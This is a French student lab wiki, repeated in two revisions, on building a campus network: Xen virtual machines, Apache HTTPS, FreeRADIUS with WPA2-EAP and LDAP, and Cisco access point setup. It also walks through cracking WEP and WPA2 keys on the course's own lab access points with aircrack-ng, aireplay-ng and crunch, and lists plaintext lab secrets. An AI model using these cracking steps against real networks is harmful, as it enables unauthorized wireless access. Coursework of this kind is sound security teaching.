ServerName www.pegase.space
DocumentRoot /var/www/html
SSLEngine On
SSLCertificateFile /etc/ssl/certs/pegase.space.crt
SSLCertificateKeyFile /etc/ssl/private/pegase.space.key
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem
SSLVerifyClient None
</VirtualHost>

Le premier VirtualHost s'assure que l'utilisateur se connecte toujours en https (grâce au Redirect) et le second est justement utilisé pour l'accès en https au site.

Enfin, on redémarre le service apache2 pour que les modifications soient prises en compte.

service apache2 restart

== Serveur FreeRADIUS et WiFi WPA2-EAP ==

=== Serveur FreeRADIUS ===

Il faut avant toute chose installer FreeRADIUS sur la VM :

apt-get install freeradius

Ensuite nous allons faire en sorte de configurer un utilisateur et son mot de passe. Remarque, il est possible d'utiliser une base de données MySQL par exemple ou un serveur LDAP pour authentifier les utilisateurs. Nous ajoutons une ligne dans le fichier <code>/etc/freeradius/3.0/users</code>

pegase Cleartext-Password := "glopglop"

On continue la configuration et cette fois nous allons configurer le module EAP pour que l'authentification utilise la méthode PEAP du protocole EAP.

On se rend dans <code>/etc/freeradius/3.0/mods-enabled</code> et on modifie le paramètre <code>default_eap_type</code> comme suit :

eap{
default_eap_type = peap
}

Ensuite, dans le fichier <code>/etc/freeradius/mods-enabled/mschap</code>, il faut activer ces paramètres

use_mppe = yes
require_encryption = yes
require_strong = yes

et ajouter cette ligne :

with_ntdomain_hack = yes

Finalement, on ajoute un client dans le fichier <code>clients.conf</code>

client 192.168.0.10/32
{
secret = secretIMA5SC
shortname = bornePegase
}

Pour résumer, l'authentification sera assurée par un ensemble de protocole qui combinés forme EAP-PEAP MSCHAPv2, la méthode la plus répandue actuellement.

=== Configuration de la borne WiFi ===

Nous avons du configurer la borne WiFi commune pour ajouter notre SSID pegase et renseigner quelques informations sur notre serveur FreeRADIUS et sur le type d'authentification.

en
conf t
aaa new-model
aaa authentication login eap_group03 group radius_group03
aaa group server radius radius_group03
server 193.48.57.179 auth-port 1812 acct-port 1813
radius-server host 193.48.57.179 auth-port 1812 acct-port 1813 key secretIMA5SC
end

On peut maintenant créer notre SSID pegase dans la vlan 13 :

en
conf t
dot11 ssid pegase
vlan 13
authentication open eap eap_group03
authentication network-eap eap_group03
authentication key-management wpa
Mbssid Guest-mode
end

On configure la liaison entre l'interface WiFi dot11radio0 et la vlan 13 :

en
conf t
int dot11radio0
Mbssid
ssid pegase
encryption vlan 13 mode ciphers aes-ccm tkip

On active enfin l'encapsulation dot1Q pour notre vlan :

en
conf t
int dot11radio0.13
encapsulation dot1Q 13
end

== Cassage d'une clef WEP ==

La procédure est quasiment similaire à celle utilisée pour WPA. On crée l'interface moniteur, on écoute le réseau pour récupérer l'adresse MAC de la borne Wifi cracotte03 et enfin on écoute le trafic de la borne dans le but de récolter des vecteurs d'initialisation qui seront utilisés pour trouver la clef.

En parallèle, on vient simuler des connexions sur cracotte03 pour augmenter l'efficacité de la récolte des trames :

aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:50:52 wlp3s0mon

Malheureusement, nous n'avons pas réussi à recueillir suffisamment de données pour effectuer le cassage qui aurait du se faire de la sorte grâce au fichier de capture généré par airodump-ng :

aircrack-ng res.cap

=Partie TP personnelle=

==Authentification LDAP sur point d'accès==

L'objectif est de pouvoir s'authentifier auprès d'une borne point d'accès wifi Cisco à l'aide de ses identifiants Polytech. Pour se faire nous allons mettre en place un serveur RADIUS à l'aide de l'implémentation Open Source FreeRADIUS (https://github.com/FreeRADIUS). Le serveur RADIUS sert à interroger le serveur LDAP afin d'authentifier l'utilisateur et lui autoriser la connexion.

[[Fichier:radius-schema.png|400px|thumb|right|Topologie de notre réseau]]

Le serveur LDAP de l'école est situé sur la VLAN48, il a tout d'abord fallu vérifier que les machines de la VLAN50 (du bridge "StudentsInfo" des machines de TP) arrivent à accéder à celles du VLAN48. C'est bien le cas, nous arrivons bien à ping le nom de domaine ldap.polytech-lille.fr. Ainsi, nous pouvons maintenant mettre en place le serveur d'authentification sur le VLAN50.

Tout d'abord, nous allons créer une machine virtuelle sur Cordouan afin d'y mettre le serveur RADIUS. Pour se faire nous allons installer les paquets suivants :

apt-get install freeradius freeradius-ldap

On précise freeradius-ldap pour ajouter le module ldap, en effet FreeRADIUS est un serveur d'authentification qui ne gère pas que LDAP.

===Configuration du serveur RADIUS===

Pour configurer notre serveur RADIUS, on édite dans un premier temps le fichier <code>/etc/freeradius/3.0/clients.conf</code> en y ajoutant notre borne WiFi :

client borneWifi {
ipaddr = 172.26.145.111
secret = IMA5SC
}

On spécifie ensuite dans le fichier <code>users</code> que l'on souhaite authentifier les utilisateurs grâce au serveur LDAP :

DEFAULT LDAP-Group != "radius_users", Auth-Type := Reject
DEFAULT Auth-Type := LDAP
Fall-Through = 1

On décommente les lignes :

# Auth-Type LDAP {
# ldap
# }

du fichier sites-available/inner-tunnel

Finalement, on change la configuration du fichier <code>ldap</code> du dossier <code>mods-available</code> :

ldap {
server = "ldap.polytech-lille.fr"
basedn = "dc=example,dc=com"
password_attribute = "userPassword"
filter = "(uid=%{Stripped-User-Name:-%{User-Name}})"
start_tls = no
groupname_attribute = cn
groupmembership_filter = "(|(&(objectClass=GroupOfNames)(member=%{Ldap-UserDn}))(&(objectClass=GroupOfUniqueNames)(uniquemember=%{Ldap-UserDn})))"
groupmembership_attribute = radius_users
ldap_connections_number = 5
timeout = 4
timelimit = 3
net_timeout = 1
# set_auth_type = yes
}

Nous nous sommes malheureusement laissés déborder par le TP global et nous n'avons pas eu le temps de demander les informations relatives au serveur LDAP de Polytech et donc de vérifier le bon fonctionnement ou non de notre serveur FreeRADIUS.

===Configuration du point d'accès===

On commence par donner une IP à la borne et définir sa gateway :

enable
conf t
int bvi1
ip address 172.26.145.111 255.255.255.0
end

enable
conf t
ip default-gateway 172.26.145.0
end

On utilise ensuite la configuration vue plus haut pour la sécurisation et l’authentification :

en
conf t
aaa new-model
aaa authentication login eap_group03 group radius_group03
aaa group server radius radius_group03
server 172.26.145.115 auth-port 1812 acct-port 1813
radius-server host 172.26.145.115 auth-port 1812 acct-port 1813 key IMA5SC
end

On peut maintenant créer notre SSID pegase_ldap dans la vlan 50:

en
conf t
dot11 ssid pegase
vlan 50
authentication open eap eap_group03
authentication network-eap eap_group03
authentication key-management wpa
Mbssid Guest-mode
end

On configure la liaison entre l'interface WiFi dot11radio0 et la vlan 13 :

en
conf t
int dot11radio0
Mbssid
ssid pegase
encryption vlan 50 mode ciphers aes-ccm tkip

On active enfin l'encapsulation dot1Q pour notre vlan :

en
conf t
int dot11radio0.50
encapsulation dot1Q 50
end

TP sysres IMA2a5 2019/2020 G6

2019-11-28T19:53:04Z

Jcabrald :

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 14, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_VM_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_groupe6 group radius_groupe6 // remplacer groupe6 par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour nous, groupe6="IMA2a5_4fun". [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
authentication open eap eap_groupe6
authentication network-eap eap_groupe6
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7 [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun" [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles.

15- Attribuer une ip à la borne
enable
conf t
int bvi1
ip address 10.60.0.100 255.255.255.0
exit
exit

on peut maintenant pinger le routeur: <code> ping 10.60.0.254 </code>, mais le les VM

16-Il faut donc rajouter le gateway
enable
conf t
ip route 0.0.0.0 0.0.0.0 10.60.0.253
exit

maintenant on peut reussir à pinger les VM: <code> ping 193.48.57.166 </code>

=== Mise en place du serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/3.0//mods-enabled/mschap</code> on décommente les lignes suivantes et modifie

use_mppe = yes
require_encryption = yes
require_strong = yes

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

Dans le fichier <code> /etc/freeradius/3.0/clients.conf </code> rajouter le borne comme un client qui se connectera sur le server radius:

client access-point { // nom attribué au client
ipaddr = 10.60.0.100 //adresse ip de la borne
secret = secret_IMA2a5-4fun //mot secret saisi lors de la configuration de la borne
}

Une fois toutes les confirations terminées, nous alons:
-arrêter le server Freeradius
service freeradius stop
-puis le relancer en mode debug afin de visualiser les reqûetes et logs
freeradius -X

===Mise en place serveur DHCP===

Une fois la configuration des bornes et de FreeRadius finie, nous devons rajouter un serveur DHCP sur la borne Wi-Fi. Ainsi, les utilisateur pourront avoir une adresse IP attribuée.

sur le terminal de confiration cisco:
ip dhcp pool groupe6 /goupe6 = "IMA2a5-4fun"
network 10.60.7.0
ns-server celui_de_polytech
ip dhcp pool IMA2a5-4fun excluded-address 10.60.7.252 10.60.7.254

Ca n'a pas marché sur la borne. On le fait donc sur le routeur.

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

[https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020/cmds _]

TP sysres IMA2a5 2019/2020 G6

2019-11-28T19:48:45Z

Jcabrald :

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 14, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_VM_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_groupe6 group radius_groupe6 // remplacer groupe6 par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour nous, groupe6="IMA2a5_4fun". [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
authentication open eap eap_groupe6
authentication network-eap eap_groupe6
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7 [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun" [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles.

15- Attribuer une ip à la borne
enable
conf t
int bvi1
ip address 10.60.0.100 255.255.255.0
exit
exit

on peut maintenant pinger le routeur: <code> ping 10.60.0.254 </code>, mais le les VM

16-Il faut donc rajouter le gateway
enable
conf t
ip route 0.0.0.0 0.0.0.0 10.60.0.253
exit

maintenant on peut reussir à pinger les VM: <code> ping 193.48.57.166 </code>

=== Mise en place du serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/3.0//mods-enabled/mschap</code> on décommente les lignes suivantes et modifie

use_mppe = yes
require_encryption = yes
require_strong = yes

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

Dans le fichier <code> /etc/freeradius/3.0/clients.conf </code> rajouter le borne comme un client qui se connectera sur le server radius:

client access-point { // nom attribué au client
ipaddr = 10.60.0.100 //adresse ip de la borne
secret = secret_IMA2a5-4fun //mot secret saisi lors de la configuration de la borne
}

Une fois toutes les confirations terminées, nous alons:
-arrêter le server Freeradius
service freeradius stop
-puis le relancer en mode debug afin de visualiser les reqûetes et logs
freeradius -X

===Mise en place serveur DHCP===

Une fois la configuration des bornes et de FreeRadius finie, nous devons rajouter un serveur DHCP sur la borne Wi-Fi. Ainsi, les utilisateur pourront avoir une adresse IP attribuée.

sur le terminal de confiration cisco:
ip dhcp pool groupe6 /goupe6 = "IMA2a5-4fun"
network 10.60.7.0
ns-server celui_de_polytech
ip dhcp pool IMA2a5-4fun excluded-address 10.60.7.252 10.60.7.254

Ca n'a pas marché sur la borne. On le fait donc sur le routeur.

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

